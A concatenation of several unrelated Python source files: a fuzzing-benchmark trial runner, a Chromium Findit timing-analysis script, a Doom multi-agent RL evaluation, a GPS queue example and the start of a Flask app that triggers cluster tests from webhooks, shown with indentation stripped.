SEED_CORPUS_ARCHIVE_SUFFIX = '_seed_corpus.zip'
File = namedtuple('File', ['path', 'modified_time', 'change_time'])
fuzzer_errored_out = False # pylint:disable=invalid-name
def _clean_seed_corpus(seed_corpus_dir):
"""Moves seed corpus files from sub-directories into the corpus directory
root. Also, deletes any files that exceed the 1 MB limit."""
if not os.path.exists(seed_corpus_dir):
return
failed_to_move_files = []
for root, _, files in os.walk(seed_corpus_dir):
for filename in files:
file_path = os.path.join(root, filename)
if os.path.getsize(file_path) > CORPUS_ELEMENT_BYTES_LIMIT:
os.remove(file_path)
logs.warning('Removed seed file %s as it exceeds 1 Mb limit.',
file_path)
continue
sha1sum = utils.file_hash(file_path)
new_file_path = os.path.join(seed_corpus_dir, sha1sum)
try:
shutil.move(file_path, new_file_path)
except OSError:
failed_to_move_files.append((file_path, new_file_path))
if failed_to_move_files:
logs.error('Failed to move seed corpus files: %s', failed_to_move_files)
def _get_fuzzer_environment():
"""Returns environment to run the fuzzer in (outside virtualenv)."""
env = os.environ.copy()
path = env.get('PATH')
if not path:
return env
path_parts = path.split(':')
# |VIRTUALENV_DIR| is the virtualenv environment that runner.py is running
# in. Fuzzer dependencies are installed in the system python environment,
# so need to remove it from |PATH|.
virtualenv_dir = env.get('VIRTUALENV_DIR')
if not virtualenv_dir:
return env
path_parts_without_virtualenv = [
p for p in path_parts if not p.startswith(virtualenv_dir)
]
env['PATH'] = ':'.join(path_parts_without_virtualenv)
return env
def get_clusterfuzz_seed_corpus_path(fuzz_target_path):
"""Returns the path of the clusterfuzz seed corpus archive if one exists.
Otherwise returns None."""
fuzz_target_without_extension = os.path.splitext(fuzz_target_path)[0]
seed_corpus_path = (fuzz_target_without_extension +
SEED_CORPUS_ARCHIVE_SUFFIX)
return seed_corpus_path if os.path.exists(seed_corpus_path) else None
def _unpack_clusterfuzz_seed_corpus(fuzz_target_path, corpus_directory):
"""If a clusterfuzz seed corpus archive is available, unpack it into the
corpus directory if it exists. Copied from unpack_seed_corpus in
engine_common.py in ClusterFuzz.
"""
seed_corpus_archive_path = get_clusterfuzz_seed_corpus_path(
fuzz_target_path)
if not seed_corpus_archive_path:
return
with zipfile.ZipFile(seed_corpus_archive_path) as zip_file:
# Unpack seed corpus recursively into the root of the main corpus
# directory.
idx = 0
for seed_corpus_file in zip_file.infolist():
if seed_corpus_file.filename.endswith('/'):
# Ignore directories.
continue
# Allow callers to opt-out of unpacking large files.
if seed_corpus_file.file_size > CORPUS_ELEMENT_BYTES_LIMIT:
continue
output_filename = '%016d' % idx
output_file_path = os.path.join(corpus_directory, output_filename)
zip_file.extract(seed_corpus_file, output_file_path)
idx += 1
logs.info('Unarchived %d files from seed corpus %s.', idx,
seed_corpus_archive_path)
def run_fuzzer(max_total_time, log_filename):
"""Runs the fuzzer using its script. Logs stdout and stderr of the fuzzer
script to |log_filename| if provided."""
input_corpus = environment.get('SEED_CORPUS_DIR')
output_corpus = environment.get('OUTPUT_CORPUS_DIR')
fuzz_target_name = environment.get('FUZZ_TARGET')
target_binary = fuzzer_utils.get_fuzz_target_binary(FUZZ_TARGET_DIR,
fuzz_target_name)
if not target_binary:
logs.error('Fuzz target binary not found.')
return
_unpack_clusterfuzz_seed_corpus(target_binary, input_corpus)
_clean_seed_corpus(input_corpus)
if max_total_time is None:
logs.warning('max_total_time is None. Fuzzing indefinitely.')
runner_niceness = environment.get('RUNNER_NICENESS', 0)
try:
# Because the runner is launched at a higher priority,
# set it back to the default(0) for fuzzing processes.
command = [
'nice', '-n',
str(0 - runner_niceness), 'python3', '-u', '-c',
('import fuzzer; '
'fuzzer.fuzz('
"'{input_corpus}', '{output_corpus}', '{target_binary}')").format(
input_corpus=shlex.quote(input_corpus),
output_corpus=shlex.quote(output_corpus),
target_binary=shlex.quote(target_binary))
]
fuzzer_environment = _get_fuzzer_environment()
# Write output to stdout if user is fuzzing from command line.
# Otherwise, write output to the log file.
if environment.get('FUZZ_OUTSIDE_EXPERIMENT'):
new_process.execute(command,
timeout=max_total_time,
write_to_stdout=True,
kill_children=True,
env=fuzzer_environment)
else:
with open(log_filename, 'wb') as log_file:
new_process.execute(command,
timeout=max_total_time,
output_file=log_file,
kill_children=True,
env=fuzzer_environment)
except subprocess.CalledProcessError:
global fuzzer_errored_out # pylint:disable=invalid-name
fuzzer_errored_out = True
logs.error('Fuzz process returned nonzero.')
class TrialRunner: # pylint: disable=too-many-instance-attributes
"""Class for running a trial."""
def __init__(self):
benchmark_fuzzer_directory = '%s-%s' % (environment.get('BENCHMARK'),
environment.get('FUZZER'))
if not environment.get('FUZZ_OUTSIDE_EXPERIMENT'):
bucket = environment.get('CLOUD_EXPERIMENT_BUCKET')
experiment_name = environment.get('EXPERIMENT')
trial = 'trial-%d' % environment.get('TRIAL_ID')
self.gcs_sync_dir = posixpath.join(bucket, experiment_name,
'experiment-folders',
benchmark_fuzzer_directory,
trial)
# Clean the directory before we use it.
gsutil.rm(self.gcs_sync_dir, force=True, parallel=True)
else:
self.gcs_sync_dir = None
self.cycle = 1
self.corpus_dir = 'corpus'
self.corpus_archives_dir = 'corpus-archives'
self.results_dir = 'results'
self.unchanged_cycles_path = os.path.join(self.results_dir,
'unchanged-cycles')
self.last_sync_time = None
self.corpus_dir_contents = set()
def initialize_directories(self):
"""Initialize directories needed for the trial."""
directories = [
self.corpus_dir,
self.corpus_archives_dir,
self.results_dir,
]
for directory in directories:
filesystem.recreate_directory(directory)
def conduct_trial(self):
"""Conduct the benchmarking trial."""
self.initialize_directories()
log_file = os.path.join(self.results_dir, 'fuzzer-log.txt')
logs.info('Starting trial.')
max_total_time = environment.get('MAX_TOTAL_TIME')
args = (max_total_time, log_file)
fuzz_thread = threading.Thread(target=run_fuzzer, args=args)
fuzz_thread.start()
if environment.get('FUZZ_OUTSIDE_EXPERIMENT'):
# Hack so that the fuzz_thread has some time to fail if something is
# wrong. Without this we will sleep for a long time before checking
# if the fuzz thread is alive.
time.sleep(5)
while fuzz_thread.is_alive():
self.sleep_until_next_sync()
self.do_sync()
self.cycle += 1
logs.info('Doing final sync.')
self.do_sync(final_sync=True)
fuzz_thread.join()
def sleep_until_next_sync(self):
"""Sleep until it is time to do the next sync."""
if self.last_sync_time is not None:
next_sync_time = (self.last_sync_time +
experiment_utils.get_snapshot_seconds())
sleep_time = next_sync_time - time.time()
if sleep_time < 0:
# Log error if a sync has taken longer than
# get_snapshot_seconds() and messed up our time
# synchronization.
logs.warning('Sleep time on cycle %d is %d', self.cycle,
sleep_time)
sleep_time = 0
else:
sleep_time = experiment_utils.get_snapshot_seconds()
logs.debug('Sleeping for %d seconds.', sleep_time)
time.sleep(sleep_time)
# last_sync_time is recorded before the sync so that each sync happens
# roughly get_snapshot_seconds() after each other.
self.last_sync_time = time.time()
def _set_corpus_dir_contents(self):
"""Set |self.corpus_dir_contents| to the current contents of
|self.corpus_dir|. Don't include files or directories excluded by
|EXCLUDE_PATHS|."""
self.corpus_dir_contents = set()
corpus_dir = os.path.abspath(self.corpus_dir)
for root, _, files in os.walk(corpus_dir):
# Check if root is excluded.
relpath = os.path.relpath(root, corpus_dir)
if _is_path_excluded(relpath):
continue
for filename in files:
# Check if filename is excluded first.
if _is_path_excluded(filename):
continue
file_path = os.path.join(root, filename)
stat_info = os.stat(file_path)
last_modified_time = stat_info.st_mtime
# Warning: ctime means creation time on Win and may not work as
# expected.
last_changed_time = stat_info.st_ctime
file_tuple = File(file_path, last_modified_time,
last_changed_time)
self.corpus_dir_contents.add(file_tuple)
def is_corpus_dir_same(self):
"""Sets |self.corpus_dir_contents| to the current contents and returns
True if it is the same as the previous contents."""
logs.debug('Checking if corpus dir is the same.')
prev_contents = self.corpus_dir_contents.copy()
self._set_corpus_dir_contents()
return prev_contents == self.corpus_dir_contents
def do_sync(self, final_sync=False):
"""Save corpus archives and results to GCS."""
try:
if not final_sync and self.is_corpus_dir_same():
logs.debug('Cycle: %d unchanged.', self.cycle)
filesystem.append(self.unchanged_cycles_path, str(self.cycle))
else:
logs.debug('Cycle: %d changed.', self.cycle)
self.archive_and_save_corpus()
self.save_results()
logs.debug('Finished sync.')
except Exception: # pylint: disable=broad-except
logs.error('Failed to sync cycle: %d.', self.cycle)
def archive_corpus(self):
"""Archive this cycle's corpus."""
archive = os.path.join(
self.corpus_archives_dir,
experiment_utils.get_corpus_archive_name(self.cycle))
directories = [self.corpus_dir]
if self.cycle == 1:
# Some fuzzers like eclipser and LibFuzzer don't actually copy the
# seed/input corpus to the output corpus (which AFL does do), this
# results in their coverage being undercounted.
seed_corpus = environment.get('SEED_CORPUS_DIR')
directories.append(seed_corpus)
archive_directories(directories, archive)
return archive
def save_corpus_archive(self, archive):
"""Save corpus |archive| to GCS and delete when done."""
if not self.gcs_sync_dir:
return
basename = os.path.basename(archive)
gcs_path = posixpath.join(self.gcs_sync_dir, self.corpus_dir, basename)
# Don't use parallel to avoid stability issues.
gsutil.cp(archive, gcs_path)
# Delete corpus archive so disk doesn't fill up.
os.remove(archive)
@retry.wrap(NUM_RETRIES, RETRY_DELAY,
'experiment.runner.TrialRunner.archive_and_save_corpus')
def archive_and_save_corpus(self):
"""Archive and save the current corpus to GCS."""
archive = self.archive_corpus()
self.save_corpus_archive(archive)
@retry.wrap(NUM_RETRIES, RETRY_DELAY,
'experiment.runner.TrialRunner.save_results')
def save_results(self):
"""Save the results directory to GCS."""
if not self.gcs_sync_dir:
return
# Copy results directory before rsyncing it so that we don't get an
# exception from uploading a file that changes in size. Files can change
# in size because the log file containing the fuzzer's output is in this
# directory and can be written to by the fuzzer at any time.
results_copy = filesystem.make_dir_copy(self.results_dir)
gsutil.rsync(results_copy,
posixpath.join(self.gcs_sync_dir, self.results_dir))
def archive_directories(directories, archive_path):
"""Create a tar.gz file named |archive_path| containing the contents of each
directory in |directories|."""
with tarfile.open(archive_path, 'w:gz') as tar:
for directory in directories:
tar_directory(directory, tar)
def tar_directory(directory, tar):
"""Add the contents of |directory| to |tar|. Note that this should not
exception just because files and directories are being deleted from
|directory| while this function is being executed."""
directory = os.path.abspath(directory)
directory_name = os.path.basename(directory)
for root, _, files in os.walk(directory):
for filename in files:
file_path = os.path.join(root, filename)
arcname = os.path.join(directory_name,
os.path.relpath(file_path, directory))
try:
tar.add(file_path, arcname=arcname)
except (FileNotFoundError, OSError):
# We will get these errors if files or directories are being
# deleted from |directory| as we archive it. Don't bother
# rescanning the directory, new files will be archived in the
# next sync.
pass
except Exception: # pylint: disable=broad-except
logs.error('Unexpected exception occurred when archiving.')
def _is_path_excluded(path):
"""Is any part of |path| in |EXCLUDE_PATHS|."""
path_parts = path.split(os.sep)
for part in path_parts:
if not part:
continue
if part in EXCLUDE_PATHS:
return True
return False
def experiment_main():
"""Do a trial as part of an experiment."""
logs.info('Doing trial as part of experiment.')
try:
runner = TrialRunner()
runner.conduct_trial()
except Exception as error: # pylint: disable=broad-except
logs.error('Error doing trial.')
raise error
def main():
"""Do an experiment on a development machine or on a GCP runner instance."""
logs.initialize(
default_extras={
'benchmark': environment.get('BENCHMARK'),
'component': 'runner',
'fuzzer': environment.get('FUZZER'),
'trial_id': str(environment.get('TRIAL_ID')),
})
experiment_main()
if fuzzer_errored_out:
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
|
bottleneck_query.py | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import os
import pickle
import Queue
import re
import sys
import time
from threading import Thread
_APPENGINE_SDK_DIR = os.path.join(os.path.dirname(__file__), os.path.pardir,
os.path.pardir, os.path.pardir,
os.path.pardir, os.path.pardir,
'google_appengine')
sys.path.insert(1, _APPENGINE_SDK_DIR)
from google.appengine.ext import ndb
_REMOTE_API_DIR = os.path.join(os.path.dirname(__file__), os.path.pardir)
sys.path.insert(1, _REMOTE_API_DIR)
import remote_api
from gae_libs.http.http_client_appengine import HttpClientAppengine
from libs import time_util
from model.wf_analysis import WfAnalysis
from pipeline_utils.appengine_third_party_pipeline_python_src_pipeline \
import pipeline
_THIRD_PARTY_DIR = os.path.join(
os.path.dirname(__file__), os.path.pardir, os.path.pardir, 'third_party')
sys.path.insert(0, _THIRD_PARTY_DIR)
import google
google.__path__.insert(0, os.path.join(_THIRD_PARTY_DIR, 'google'))
from handlers import handlers_util
from waterfall import swarming_util
NOW = time_util.GetUTCNow()
START_DATE, END_DATE = NOW - datetime.timedelta(days=30), NOW
THREAD_COUNT = 64
# If more than 1199 entities are requested at once, the ndb query.fetch_page()
# operation will stall.
MAX_ENTITIES_PER_REQUEST = 1199
CLIENT_SINGLETON = HttpClientAppengine()
def _BigFetch(query, page_size=MAX_ENTITIES_PER_REQUEST):
print 'Please wait. Fetching results at a rate of ~400 records per second...'
cursor = None
is_more = True
big_results = []
while is_more:
results, cursor, is_more = query.fetch_page(page_size, start_cursor=cursor)
big_results.extend(results)
print 'Finished fetching results.'
return big_results
def _FetchAnalyses(start_date, end_date):
analyses_query = WfAnalysis.query(
WfAnalysis.build_start_time >= start_date,
WfAnalysis.build_start_time < end_date)
return _BigFetch(analyses_query)
def _GetPickleFilePath():
findit_tmp_dir = os.environ.get('TMP_DIR', os.getcwd())
return (os.path.join(findit_tmp_dir, 'analyses.pickle'),
os.path.join(findit_tmp_dir, 'records.pickle'))
def _SaveAnalyses(analyses, records):
pickled_analyses = pickle.dumps(analyses)
pickled_records = pickle.dumps(records)
analyses_path, records_path = _GetPickleFilePath()
with open(analyses_path , 'w') as f:
f.write(pickled_analyses)
with open(records_path , 'w') as f:
f.write(pickled_records)
def _LoadAnalyses():
analyses_path, records_path = _GetPickleFilePath()
with open(analyses_path, 'r') as f:
pickled_analyses = f.read()
with open(records_path, 'r') as f:
pickled_records = f.read()
print 'Loading pickled analyses...'
analyses = pickle.loads(pickled_analyses)
times = [x.build_start_time for x in analyses
if hasattr(x, 'build_start_time')]
records = pickle.loads(pickled_records)
return analyses, min(times), max(times), records
def _GetTimesFromPipeline(pid):
result = {}
suffixes = {}
status_tree = pipeline.get_status_tree(pid)
for _, child_status in status_tree.get('pipelines', {}).iteritems():
cls = child_status['classPath'].split('.')[-1]
start = child_status.get('startTimeMs')
end = child_status.get('endTimeMs')
if start and end:
if (cls + '.start' + suffixes.get(cls, '')) in result.keys():
old_suffix = suffixes.get(cls, '.0')
old_index = int(old_suffix[1:])
suffixes[cls] = '.' + str(old_index + 1)
result['pl.' + cls + '.start' + suffixes.get(cls, '')] = (
_UnknownToDatetime(start))
result['pl.' + cls + '.end' + suffixes.get(cls, '')] = (
_UnknownToDatetime(end))
return result
def _GetTimes(q, r):
"""Obtains times of interest from a WfAnalysis instance.
This is meant to be run by a worker thread."""
while True:
a = q.get()
result = {
'wfa.build_start_time': a.build_start_time,
'wfa.request_time': a.request_time,
'wfa.start_time': a.start_time,
'wfa.end_time': a.end_time,
'wfa.updated_time': a.updated_time,
'wfa.result_status': a.result_status,
'wfa.build_failure_type': a.build_failure_type,
}
try:
tryjobs_times = {}
step_to_tryjobs = handlers_util.GetAllTryJobResults(
a.master_name, a.builder_name, a.build_number, True)
for step in step_to_tryjobs.keys():
this_tryjobs = step_to_tryjobs[step]['try_jobs']
for job in this_tryjobs:
if job.get('try_job_url'):
tryjobs_times.setdefault('try.' + step, {})
times = _GetTimesFromBuildbot(job['try_job_url'])
tryjobs_times['try.' + step].update(times)
if job.get('task_url'):
tryjobs_times.setdefault('swarm.' + step, {})
times = _GetTimesFromSwarming(job['task_url'])
tryjobs_times['swarm.' + step].update(times)
result.update(tryjobs_times)
if a.pipeline_status_path:
pipeline_root = re.search(r'(?<=root\=)[^&]*', a.pipeline_status_path
).group(0)
result.update(_GetTimesFromPipeline(pipeline_root))
r.put((a.key, result))
except Exception, e:
print 'Problem with ', a.key, e
q.task_done()
def _GetTimesFromBuildbot(buildbot_url):
# TODO(robertocn): Use existing code that talks to milo.
# Convert the buildbot url to request to milo.
milo_url = ('https://luci-milo.appspot.com/prpc/'
'milo.Buildbot/GetBuildbotBuildJSON')
# http://build.chromium.org/p/<master>/builders/<builder>/builds/<number>
master, _, builder, _, buildnum = str(buildbot_url).split('/')[4:]
data = json.dumps({
'master': master, 'builder': builder, 'buildNum': buildnum})
_, response = CLIENT_SINGLETON.Post(
milo_url, data, headers={'Content-Type': 'application/json'})
response_json = response[response.index('{'):]
response_data = json.loads(response_json)
result = {}
for step in response_data['steps']:
if 'name' in step and 'times' in step:
result[step['name'] + '.start'] = (
_UnknownToDatetime(step['times'][0]))
result[step['name'] + '.end'] = (
_UnknownToDatetime(step['times'][1]))
return result
def _GetTimesFromSwarming(url):
results = {}
task_id = url.split('/')[-1]
task_result, _ = swarming_util.GetSwarmingTaskResultById(
task_id, CLIENT_SINGLETON)
for k in task_result.keys():
if k.endswith('_ts'):
results[k] = _UnknownToDatetime(task_result[k])
return results
# TODO: Instead of guessing, make the right conversions when retrieving data,
# including timezone adjustment (i.e. make everything UTC)
def _UnknownToDatetime(unknown):
if isinstance(unknown, basestring):
for fmt in ('%Y-%m-%dT%H:%M:%S.%f', '%Y-%m-%dT%H:%M:%S'):
try:
return datetime.datetime.strptime(unknown,fmt)
except ValueError:
pass
# This is only used to guess whether the time given is in seconds or ms
epoch = time.mktime(datetime.datetime(year=2008, month=9, day=2).timetuple())
try:
ts = float(unknown)
if ts > epoch:
if ts > epoch * 1000:
ts = float(ts)/1000
return datetime.datetime.fromtimestamp(ts)
except (TypeError, ValueError):
# Couldn't cast it, return the original value.
pass
return unknown
def _PrependKeys(prefix, d):
new_d = {}
for k in d.keys():
new_d[prefix + k] = d[k]
return new_d
def _Denest(d):
if isinstance(d, dict):
removals = []
insertions = {}
for k, v in d.iteritems():
if isinstance(v, dict):
insertions.update(_PrependKeys(k + '.', v))
removals.append(k)
for k in removals:
del(d[k])
d.update(insertions)
return d
# This is hacky, we should make everything UTC as the times are read from the
# source.
def _IsUtcLabel(l):
parts = l.split('.')
return len(parts) == 1 or l.startswith('waterfall.') or (
len(parts) == 2 and l.endswith('_ts'))
def main():
# TODO: add options to limit the date range to fetch
# TODO: add options to display summary of fetched info.
remote_api.EnableRemoteApi(app_id='findit-for-me')
try:
all_analyses, stored_start, stored_end, time_records = _LoadAnalyses()
except IOError:
all_analyses = _FetchAnalyses(START_DATE, END_DATE)
time_records = {}
_SaveAnalyses(all_analyses, time_records)
else:
if stored_start > START_DATE:
all_analyses = _FetchAnalyses(START_DATE, stored_start) + all_analyses
if END_DATE > stored_end:
all_analyses += _FetchAnalyses(stored_end, END_DATE)
_SaveAnalyses(all_analyses, time_records)
saved_count = len(time_records)
q = Queue.Queue()
r = Queue.Queue()
for _ in range(THREAD_COUNT):
t = Thread(target=_GetTimes, args=(q, r))
t.daemon = True
t.start()
for a in all_analyses:
if a.key not in time_records.keys():
q.put(a)
while not (q.empty() and r.empty()):
key, record = r.get()
time_records[key] = _Denest(record)
print len(time_records)
for k, v in time_records[key].iteritems():
if _IsUtcLabel(k) and isinstance(v, datetime.datetime):
time_records[key][k] = v - datetime.timedelta(hours=8)
if saved_count + THREAD_COUNT < len(time_records):
_SaveAnalyses(all_analyses, time_records)
saved_count = len(time_records)
print 'Saved %d results' % saved_count
q.join()
if __name__ == '__main__':
main()
|
multi_agent_match.py | import os
import sys
import time
from multiprocessing import Process
from os.path import join
import numpy as np
import torch
from algorithms.appooc.learner import LearnerWorker
from algorithms.appooc.model import create_actor_critic
from algorithms.utils.arguments import parse_args, load_from_checkpoint
from algorithms.utils.multi_agent_wrapper import MultiAgentWrapper, is_multiagent_env
from envs.create_env import create_env
from utils.utils import log, AttrDict
class Rival:
def __init__(self, name, args):
self.name = name
self.args = args
self.policy_index = None
self.parsed_config = parse_args(args, evaluation=True)
self.cfg = load_from_checkpoint(self.parsed_config)
self.actor_critic = None
self.rnn_state = None
RIVALS = [
Rival(name='duel',
args=[
'--env=doom_duel',
'--algo=appooc',
'--experiment=00_bots_ssl2_fs2_ppo_1',
'--experiments_root=paper_doom_duel_v65_fs2/bots_ssl2_fs2'
]),
Rival(name='duel_bots',
args=[
'--env=doom_duel_bots',
'--algo=appooc',
'--experiment=00_bots_ssl2_fs2_ppo_1',
'--experiments_root=paper_doom_duel_bots_v65_fs2/bots_ssl2_fs2'
]),
]
ENV_NAME = 'doom_duel'
NO_RENDER = True
FPS = 10000
def multi_agent_match(policy_indices, max_num_episodes=int(1e9), max_num_frames=1e10):
log.debug('Starting eval process with policies %r', policy_indices)
for i, rival in enumerate(RIVALS):
rival.policy_index = policy_indices[i]
curr_dir = os.path.dirname(os.path.abspath(__file__))
evaluation_filename = join(curr_dir,
f'eval_{"vs".join([str(pi) for pi in policy_indices])}.txt')
with open(evaluation_filename, 'w') as fobj:
fobj.write('start\n')
common_config = RIVALS[0].cfg
render_action_repeat = common_config.render_action_repeat if common_config.render_action_repeat is not None else common_config.env_frameskip
if render_action_repeat is None:
log.warning('Not using action repeat!')
render_action_repeat = 1
log.debug('Using action repeat %d during evaluation', render_action_repeat)
common_config.env_frameskip = 1 # for evaluation
common_config.num_envs = 1
common_config.timelimit = 4.0 # for faster evaluation
def make_env_func(env_config):
return create_env(ENV_NAME, cfg=common_config, env_config=env_config)
env = make_env_func(AttrDict({'worker_index': 0, 'vector_index': 0}))
env.seed(0)
is_multiagent = is_multiagent_env(env)
if not is_multiagent:
env = MultiAgentWrapper(env)
else:
assert env.num_agents == len(RIVALS)
device = torch.device('cuda')
for rival in RIVALS:
rival.actor_critic = create_actor_critic(rival.cfg, env.observation_space, env.action_space)
rival.actor_critic.model_to_device(device)
policy_id = rival.policy_index
checkpoints = LearnerWorker.get_checkpoints(
LearnerWorker.checkpoint_dir(rival.cfg, policy_id))
checkpoint_dict = LearnerWorker.load_checkpoint(checkpoints, device)
rival.actor_critic.load_state_dict(checkpoint_dict['model'])
episode_rewards = []
num_frames = 0
last_render_start = time.time()
def max_frames_reached(frames):
return max_num_frames is not None and frames > max_num_frames
wins = [0 for _ in RIVALS]
ties = 0
frag_differences = []
with torch.no_grad():
for _ in range(max_num_episodes):
obs = env.reset()
obs_dict_torch = dict()
done = [False] * len(obs)
for rival in RIVALS:
rival.rnn_states = torch.zeros([1, rival.cfg.hidden_size],
dtype=torch.float32,
device=device)
episode_reward = 0
prev_frame = time.time()
while True:
actions = []
for i, obs_dict in enumerate(obs):
for key, x in obs_dict.items():
obs_dict_torch[key] = torch.from_numpy(x).to(device).float().view(
1, *x.shape)
rival = RIVALS[i]
policy_outputs = rival.actor_critic(obs_dict_torch, rival.rnn_states)
rival.rnn_states = policy_outputs.rnn_states
actions.append(policy_outputs.actions[0].cpu().numpy())
for _ in range(render_action_repeat):
if not NO_RENDER:
target_delay = 1.0 / FPS if FPS > 0 else 0
current_delay = time.time() - last_render_start
time_wait = target_delay - current_delay
if time_wait > 0:
# log.info('Wait time %.3f', time_wait)
time.sleep(time_wait)
last_render_start = time.time()
env.render()
obs, rew, done, infos = env.step(actions)
if all(done):
log.debug('Finished episode!')
frag_diff = infos[0]['PLAYER1_FRAGCOUNT'] - infos[0]['PLAYER2_FRAGCOUNT']
if frag_diff > 0:
wins[0] += 1
elif frag_diff < 0:
wins[1] += 1
else:
ties += 1
frag_differences.append(frag_diff)
avg_frag_diff = np.mean(frag_differences)
report = f'wins: {wins}, ties: {ties}, avg_frag_diff: {avg_frag_diff}'
with open(evaluation_filename, 'a') as fobj:
fobj.write(report + '\n')
# log.info('%d:%d', infos[0]['PLAYER1_FRAGCOUNT'], infos[0]['PLAYER2_FRAGCOUNT'])
episode_reward += np.mean(rew)
num_frames += 1
if num_frames % 100 == 0:
log.debug('%.1f', render_action_repeat / (time.time() - prev_frame))
prev_frame = time.time()
if all(done):
log.info('Episode finished at %d frames', num_frames)
break
if all(done) or max_frames_reached(num_frames):
break
if not NO_RENDER:
env.render()
time.sleep(0.01)
episode_rewards.append(episode_reward)
last_episodes = episode_rewards[-100:]
avg_reward = sum(last_episodes) / len(last_episodes)
log.info(
'Episode reward: %f, avg reward for %d episodes: %f',
episode_reward,
len(last_episodes),
avg_reward,
)
if max_frames_reached(num_frames):
break
env.close()
def main():
"""Script entry point."""
multi_process = True
if multi_process:
num_policies = 8
processes = []
for p_id in range(num_policies):
process = Process(target=multi_agent_match, args=[(p_id, 0)])
process.start()
processes.append(process)
time.sleep(5.0)
for process in processes:
process.join()
else:
multi_agent_match((0, 0))
return 0
if __name__ == '__main__':
sys.exit(main())
|
QueuesExample.py | import time
import queue
import threading
import pyxa1110
framesQueue = queue.Queue()
runEvent = threading.Event()
runEvent.set()
def fetchData ():
with pyxa1110.GPS() as gps:
while runEvent.is_set():
gps.receiveData()
framesQueue.put(gps.ascii())
def flushQueue ():
while runEvent.is_set():
time.sleep(0.5)
try:
item = framesQueue.get(False)
if item is not None:
print(item)
except queue.Empty:
pass
threads = []
#Thread that retreive data from GPS Device
t1 = threading.Thread(target = fetchData)
t1.start()
threads.append(t1)
#Thread that proceed data if available
t2 = threading.Thread(target = flushQueue)
t2.start()
threads.append(t2)
try:
while 1:
time.sleep(.1)
except KeyboardInterrupt:
print("\nClosing app...")
runEvent.clear()
framesQueue.task_done()
for t in threads:
t.join()
print("App closed")
|
keytar.py | #!/usr/bin/env python
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Keytar flask app.
This program is responsible for exposing an interface to trigger cluster level
tests. For instance, docker webhooks can be configured to point to this
application in order to trigger tests upon pushing new docker images.
"""
import argparse
import collections
import datetime
import json
import logging
import os
import Queue
import shutil
import subprocess
import tempfile
import threading
import yaml
import flask
app = flask.Flask(__name__)
results = collections.OrderedDict()
_TEMPLATE = (
'python {directory}/test_runner.py -c "{config}" -t {timestamp} '
'-d {tempdir} -s {server}')
class KeytarError(Exception):
pass
def run_test_config(config):
"""Runs a single test iteration from a configuration."""
tempdir = tempfile.mkdtemp()
logging.info('Fetching github repository')
# Get the github repo and clone it.
github_config = config['github']
github_clone_args, github_repo_dir = _get_download_github_repo_args(
tempdir, github_config)
os.makedirs(github_repo_dir)
subprocess.call(github_clone_args)
current_dir = os.getcwd()
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M')
results[timestamp] = {
'timestamp': timestamp,
'status': 'Start',
'tests': {},
'docker_image': config['docker_image']
}
# Generate a test script with the steps described in the configuration,
# as well as the command to execute the test_runner.
with tempfile.NamedTemporaryFile(dir=tempdir, delete=False) as f:
tempscript = f.name
f.write('#!/bin/bash\n')
if 'before_test' in config:
# Change to the github repo directory, any steps to be run before the
# tests should be executed from there.
os.chdir(github_repo_dir)
for before_step in config['before_test']:
f.write('%s\n' % before_step)
server = 'http://localhost:%d' % app.config['port']
f.write(_TEMPLATE.format(
directory=current_dir, config=yaml.dump(config), timestamp=timestamp,
tempdir=tempdir, server=server))
os.chmod(tempscript, 0775)
try:
subprocess.call([tempscript])
except subprocess.CalledProcessError as e:
logging.warn('Error running test_runner: %s', str(e))
finally:
os.chdir(current_dir)
shutil.rmtree(tempdir)
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/test_results')
def test_results():
return json.dumps([results[x] for x in sorted(results)])
@app.route('/test_log')
def test_log():
# Fetch the output from a test.
log = '%s.log' % os.path.basename(flask.request.values['log_name'])
return (flask.send_from_directory('/tmp/testlogs', log), 200,
{'Content-Type': 'text/css'})
@app.route('/update_results', methods=['POST'])
def update_results():
# Update the results dict, called from the test_runner.
update_args = flask.request.get_json()
timestamp = update_args['timestamp']
results[timestamp].update(update_args)
return 'OK'
def _validate_request(keytar_password, request_values):
"""Checks a request against the password provided to the service at startup.
Raises an exception on errors, otherwise returns None.
Args:
keytar_password: password provided to the service at startup.
request_values: dict of POST request values provided to Flask.
Raises:
KeytarError: raised if the password is invalid.
"""
if keytar_password:
if 'password' not in request_values:
raise KeytarError('Expected password not provided in test_request!')
elif request_values['password'] != keytar_password:
raise KeytarError('Incorrect password passed to test_request!')
@app.route('/test_request', methods=['POST'])
def test_request():
"""Respond to a post request to execute tests.
This expects a json payload containing the docker webhook information.
If this app is configured to use a password, the password should be passed in
as part of the POST request.
Returns:
HTML response.
"""
try:
_validate_request(app.config['password'], flask.request.values)
except KeytarError as e:
flask.abort(400, str(e))
webhook_data = flask.request.get_json()
repo_name = webhook_data['repository']['repo_name']
test_configs = [c for c in app.config['keytar_config']['config']
if c['docker_image'] == repo_name]
if not test_configs:
return 'No config found for repo_name: %s' % repo_name
for test_config in test_configs:
test_worker.add_test(test_config)
return 'OK'
def handle_cluster_setup(cluster_setup):
"""Setups up a cluster.
Currently only GKE is supported. This step handles setting up credentials and
ensuring a valid project name is used.
Args:
cluster_setup: YAML cluster configuration.
Raises:
KeytarError: raised on invalid setup configurations.
"""
if cluster_setup['type'] != 'gke':
return
if 'keyfile' not in cluster_setup:
raise KeytarError('No keyfile found in GKE cluster setup!')
# Add authentication steps to allow keytar to start clusters on GKE.
gcloud_args = ['gcloud', 'auth', 'activate-service-account',
'--key-file', cluster_setup['keyfile']]
logging.info('authenticating using keyfile: %s', cluster_setup['keyfile'])
subprocess.call(gcloud_args)
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = cluster_setup['keyfile']
# Ensure that a project name is correctly set. Use the name if provided
# in the configuration, otherwise use the current project name, or else
# the first available project name.
if 'project_name' in cluster_setup:
logging.info('Setting gcloud project to %s', cluster_setup['project_name'])
subprocess.call(
